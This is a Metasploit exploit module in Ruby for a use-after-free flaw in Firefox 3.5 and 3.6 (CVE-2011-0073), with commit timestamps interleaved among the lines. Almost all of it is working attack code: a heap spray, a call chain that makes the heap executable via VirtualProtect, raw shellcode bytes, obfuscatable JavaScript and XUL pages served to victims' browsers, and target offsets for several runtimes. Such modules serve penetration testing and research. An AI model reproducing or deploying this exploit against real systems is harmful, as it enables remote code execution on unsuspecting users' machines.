2011-10-15 22:58:20 +00:00
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##
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# $Id$
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##
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##
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# This file is part of the Metasploit Framework and may be subject to
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# redistribution and commercial restrictions. Please see the Metasploit
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2012-02-21 01:40:50 +00:00
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# web site for more information on licensing and terms of use.
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# http://metasploit.com/
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2011-10-15 22:58:20 +00:00
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##
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require 'msf/core'
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class Metasploit3 < Msf::Exploit::Remote
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2011-10-17 04:20:53 +00:00
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Rank = NormalRanking
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2011-10-15 22:58:20 +00:00
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include Msf::Exploit::Remote::HttpServer::HTML
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2011-11-28 04:42:59 +00:00
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2011-10-15 22:58:20 +00:00
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include Msf::Exploit::Remote::BrowserAutopwn
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autopwn_info({
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:ua_name => HttpClients::FF,
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:ua_minver => "3.5",
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:ua_maxver => "3.6.16",
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:os_name => OperatingSystems::WINDOWS,
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:javascript => true,
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:rank => NormalRanking,
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:vuln_test => "if (navigator.userAgent.indexOf('Windows NT 5.1') != -1 || navigator.javaEnabled()) { is_vuln = true; }",
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})
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def initialize(info = {})
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super(update_info(info,
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'Name' => 'Mozilla Firefox "nsTreeRange" Dangling Pointer Vulnerability',
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'Description' => %q{
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This module exploits a code execution vulnerability in Mozilla Firefox
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3.6.x <= 3.6.16 and 3.5.x <= 3.5.17 found in nsTreeSelection.
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2011-10-17 03:49:49 +00:00
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By overwriting a subfunction of invalidateSelection it is possible to free the
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nsTreeRange object that the function currently operates on.
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2011-10-15 22:58:20 +00:00
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Any further operations on the freed object can result in remote code execution.
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Utilizing the call setup the function provides it's possible to bypass DEP
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without the need for a ROP. Sadly this exploit is still either dependent
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on Java or bound by ASLR because Firefox doesn't employ any ASLR-free
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modules anymore.
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},
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'License' => MSF_LICENSE,
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'Author' =>
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[
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'regenrecht', # discovered and sold to ZDI
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'xero', # Shenanigans
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],
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'Version' => '$Revision$',
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'References' =>
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[
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['CVE', '2011-0073'],
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['OSVDB', '72087'],
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['BID', '47663'],
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['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-157/'],
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['URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=630919'],
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['URL', 'http://www.mozilla.org/security/announce/2011/mfsa2011-13.html']
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],
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'DefaultOptions' =>
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{
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'EXITFUNC' => 'thread', # graceful exit if run in separate thread
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'InitialAutoRunScript' => 'migrate -f',
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},
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'Payload' =>
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{
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'Space' => 0x1000, # depending on the spray size it's actually a lot more
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},
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'Targets' =>
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[
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[ 'Auto (Direct attack against Windows XP, otherwise through Java, if enabled)',
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{
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'Platform' => 'win',
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'Arch' => ARCH_X86,
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'Auto' => true,
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'Targets' => [['navigator.userAgent.indexOf("Windows NT 5.1") != -1', 1],
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['navigator.javaEnabled()', 2]],
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'UsesJava' => true
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}
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],
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[ 'Firefox Runtime, fails with ASLR',
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{
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'Platform' => 'win',
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'Arch' => ARCH_X86,
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'VPOffset' => 0x781A91F8, # VirtualProtect
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'LLOffset' => 0x781A9104, # LoadLibraryA
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'GPAOffset' => 0x781A9014, # GetProcAddress
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'UsesJava' => false
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}
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],
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[ 'Java Runtime (7.10.3052.4), best against ASLR',
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{
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'Platform' => 'win',
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'Arch' => ARCH_X86,
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'VPOffset' => 0x7C37A140,
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'LLOffset' => 0x7C37A0B8,
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'GPAOffset' => 0x7C37A00C,
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'UsesJava' => true
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}
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],
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[ 'Java JVM (20.1.0.02)',
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{
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'Platform' => 'win',
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'Arch' => ARCH_X86,
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'VPOffset' => 0x6D9FC094,
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'LLOffset' => 0x6D9FC110,
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'GPAOffset' => 0x6D9FC188,
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'UsesJava' => true
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}
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],
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[ 'Java Regutils (6.0.260.3)',
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{
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'Platform' => 'win',
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'Arch' => ARCH_X86,
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'VPOffset' => 0x6D6C227C,
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'LLOffset' => 0x6D6C2198,
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'GPAOffset' => 0x6D6C2184,
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'UsesJava' => true
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}
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],
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],
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'DefaultTarget' => 0,
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'DisclosureDate' => 'Feb 2 2011'
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))
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register_options(
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[
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OptBool.new('SEHProlog', [ true, 'Whether to prepend the payload with an SEH prolog, to catch crashes and enable a silent exit', true]),
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OptBool.new('CreateThread', [ true, 'Whether to execute the payload in a new thread', true]),
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OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', true]),
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], self.class
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)
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register_advanced_options(
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[
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OptInt.new('BaseOffset', [ true, 'The offset we hope to have overwritten with our heap spray', 0x0F000000 ]),
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OptInt.new('SpraySize', [ true, 'The size of our heapspray blocks', 0x100000 ]),
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OptInt.new('SprayCount', [ true, 'Number of blocks to be sprayed', 200 ]),
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OptBool.new('SetBP', [ true, 'Set a breakpoint before payload execution', false ]),
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OptBool.new('Crash', [ true, 'Usa an invalid offset to make the exploit crash (for debugging)', false ]),
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], self.class
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)
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end
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2011-11-28 04:42:59 +00:00
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2011-10-15 22:58:20 +00:00
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def prepare_payload(target, p)
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base_offset = (datastore['Crash'] != true) ? datastore['BaseOffset'] : 1
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spray_size = datastore['SpraySize']
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esp_fix = 0
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callchain = []
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# Adding calls by hand is tedious, look at the bottom for an explanation of these values
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add_call = Proc.new { |offset, arg1, arg2, direct |
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next_offset = base_offset + (callchain.flatten.length*4)
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callchain[-1][2] = next_offset if callchain.length > 0 # connect new frame to last one
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if direct
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callchain <<
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[
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next_offset + 0x4 - 8,
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next_offset + 0x14,
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0,
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arg1,
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arg2,
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next_offset + 0x18 - 0x70,
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offset
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]
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else
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callchain <<
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[
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next_offset + 0x4 - 8,
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next_offset + 0x14,
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0,
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arg1,
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arg2,
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offset - 0x70
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]
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end
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}
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2011-11-28 04:42:59 +00:00
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2011-10-15 22:58:20 +00:00
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add_call.call(target['LLOffset'], base_offset, 0) # use dummy LoadLibrary call to push valid fourth VirtualProtect argument on stack
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add_call.call(target['VPOffset'], 0x10000, 0x40) # call VirtualProtect to make heap executable
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add_call.call(0xDEADBEEF, 0, 0, true) # call our shellcode
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2011-11-28 04:42:59 +00:00
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2011-10-15 22:58:20 +00:00
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callchain.flatten!
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callchain[-1] = base_offset + (callchain.length*4) # patch last offset to point to shellcode located after callchain
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esp_fix = 0x10
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payload_buf = callchain.pack('V*')
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payload_buf << "\xCC" if datastore['SetBP']
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# make rest of shellcode run in separate thread
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if datastore['CreateThread'] and target['LLOffset'] and target['GPAOffset']
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payload_buf << "\x60\x31\xc0\x50\x50\x50\xe8\x00\x00\x00\x00\x5a\x89\xd6"
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payload_buf << "\x52\x83\x04\x24\x3b\x83\xc2\x25\x83\xc6\x2e\x50\x50\x56"
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payload_buf << "\x52\xff\x15#{[target['LLOffset']].pack('V')}\x50\xff\x15#{[target['GPAOffset']].pack('V')}"
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payload_buf << "\xff\xd0\x61\xc2#{[esp_fix].pack('v')}\x6b\x65\x72\x6e\x65\x6c\x33\x32"
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payload_buf << "\x00\x43\x72\x65\x61\x74\x65\x54\x68\x72\x65\x61\x64\x00"
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esp_fix = 0
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end
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# encapsulate actual payload in SEH handler
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if datastore['SEHProlog']
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payload_buf << "\x60\xe8\x00\x00\x00\x00\x83\x04\x24\x1a\x64\xff\x35\x00"
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payload_buf << "\x00\x00\x00\x64\x89\x25\x00\x00\x00\x00\x81\xec\x00\x01"
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payload_buf << "\x00\x00\xeb\x12\x8b\x64\x24\x08\x64\x8f\x05\x00\x00\x00"
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payload_buf << "\x00\x83\xc4\x04\x61\xc2"
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payload_buf << [esp_fix].pack('v')
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end
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payload_buf << p
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# controlled crash, to return to our SEH handler
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payload_buf << "\x33\xC0\xFF\xE0" if datastore['SEHProlog']
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payload_buf
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end
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def on_request_uri(cli, request)
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if request.uri == get_resource() or request.uri =~ /\/$/
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2012-04-11 06:26:25 +00:00
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print_status("Redirecting to .html URL")
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2011-10-15 22:58:20 +00:00
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redir = get_resource()
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redir << '/' if redir[-1,1] != '/'
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redir << rand_text_alphanumeric(4+rand(4))
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redir << '.html'
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send_redirect(cli, redir)
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elsif request.uri =~ /\.html?$/
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2012-04-11 06:26:25 +00:00
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print_status("Sending HTML")
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2011-10-15 22:58:20 +00:00
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xul_name = rand_text_alpha(rand(100)+1)
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j_applet = rand_text_alpha(rand(100)+1)
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html = <<-EOS
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<html>
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#{"<applet codebase=\".\" code=\"#{j_applet}.class\" width=0 height=0></applet>" if target['UsesJava']}
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<iframe src="#{xul_name}.xul" width="1" height="1" frameborder="0"></iframe>
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</html>
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EOS
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send_response(cli, html, { 'Content-Type' => 'text/html' })
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elsif request.uri =~ /\.xul$/
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2012-04-11 06:26:25 +00:00
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print_status("Sending XUL")
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2011-10-15 22:58:20 +00:00
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js_file = rand_text_alpha(rand(100)+1)
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@js_func = rand_text_alpha(rand(32)+1)
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xul = <<-EOS
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<?xml version="1.0"?>
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<?xml-stylesheet type="text/css"?>
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<window xmlns:html="http://www.w3.org/1999/xhtml" xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul" onload="#{@js_func}()">
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<script src="#{js_file}.js"/>
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<tree id="tr">
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<treechildren>
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<treeitem>
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<treerow>
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<treecell label=""/>
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</treerow>
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</treeitem>
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</treechildren>
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</tree>
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</window>
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EOS
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send_response(cli, xul, { 'Content-Type' => 'application/vnd.mozilla.xul+xml' })
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elsif request.uri =~ /\.js$/
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2012-04-11 06:26:25 +00:00
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print_status("Sending JS")
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2011-10-15 22:58:20 +00:00
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return if ((p = regenerate_payload(cli).encoded) == nil)
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base_offset = (datastore['Crash'] != true) ? datastore['BaseOffset'] : 1
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spray_size = datastore['SpraySize']
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spray_count = datastore['SprayCount']
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if not target['Auto']
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escaped_payload = Rex::Text.to_unescape(prepare_payload(target, p))
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shellcode_str = "var shellcode = unescape(\"#{escaped_payload}\");"
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else
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shellcode_str = target['Targets'].map{ |check, index|
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"if (#{check}) {\n var shellcode = unescape(\"#{Rex::Text.to_unescape(prepare_payload(targets[index], p))}\");\n }"}.join(' else ')
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shellcode_str << " else { return; }"
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end
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escaped_addr = Rex::Text.to_unescape([base_offset].pack("V"))
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custom_js = <<-EOS
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function #{@js_func}() {
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container = new Array();
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#{shellcode_str}
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var delimiter = unescape("%udead");
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var block = unescape("#{escaped_addr}");
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while (block.length < 8)
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block += block;
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var treeSel = document.getElementById("tr").view.selection;
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treeSel.clearSelection();
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for (var count = 0; count < 30; ++count)
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container.push(block + delimiter);
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treeSel.select(0);
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treeSel.tree = {
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invalidateRange: function(s,e) {
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treeSel.tree = null;
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treeSel.clearSelection();
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for (var count = 0; count < 10; ++count)
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container.push(block + delimiter);
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var big = unescape("%u4558%u4f52");
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while (big.length < #{spray_size / 2})
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big += big;
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var pad = big.substring(0, #{(base_offset % spray_size)/2}) + shellcode;
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var spray = pad + big.substring(pad.length + 2);
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for (var count = 0; count < #{spray_count}; ++count)
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container.push(spray + delimiter);
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}
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}
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treeSel.invalidateSelection();
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}
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EOS
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if datastore['OBFUSCATE']
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opts = {
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'Symbols' => {
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'Variables' => %w{ shellcode container delimiter block treeSel big pad spray count }
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}
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}
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custom_js = obfuscate_js(custom_js,opts)
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end
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send_response(cli, custom_js, { 'Content-Type' => 'application/x-javascript' })
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end
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# Handle the payload
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handler(cli)
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end
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end
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=begin
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ESI points to shellcode
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final call looks like this: CALL [[[[ESI]+8]]+70]
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[ESI+10], [ESI+C] and [[ESI]+8] are pushed as arguments
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[ESI+8] points to the next call frame, if there is one
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104924BC /$ 56 PUSH ESI
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104924BD |. 8B7424 08 MOV ESI,DWORD PTR SS:[ESP+8]
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104924C1 |> 8B06 /MOV EAX,DWORD PTR DS:[ESI]
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104924C3 |. 8B40 08 |MOV EAX,DWORD PTR DS:[EAX+8]
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104924C6 |. 85C0 |TEST EAX,EAX
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104924C8 |. 74 0C |JE SHORT xul.104924D6
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104924CA |. FF76 10 |PUSH DWORD PTR DS:[ESI+10]
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104924CD |. 8B08 |MOV ECX,DWORD PTR DS:[EAX]
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104924CF |. FF76 0C |PUSH DWORD PTR DS:[ESI+C]
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104924D2 |. 50 |PUSH EAX
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104924D3 |. FF51 70 |CALL DWORD PTR DS:[ECX+70] # does the calling for us
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104924D6 |> 8B76 08 |MOV ESI,DWORD PTR DS:[ESI+8]
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104924D9 |. 85F6 |TEST ESI,ESI
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104924DB |.^ 75 E4 \JNZ SHORT xul.104924C1
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104924DD |. 5E POP ESI
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104924DE \. C2 0400 RETN 4
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=end
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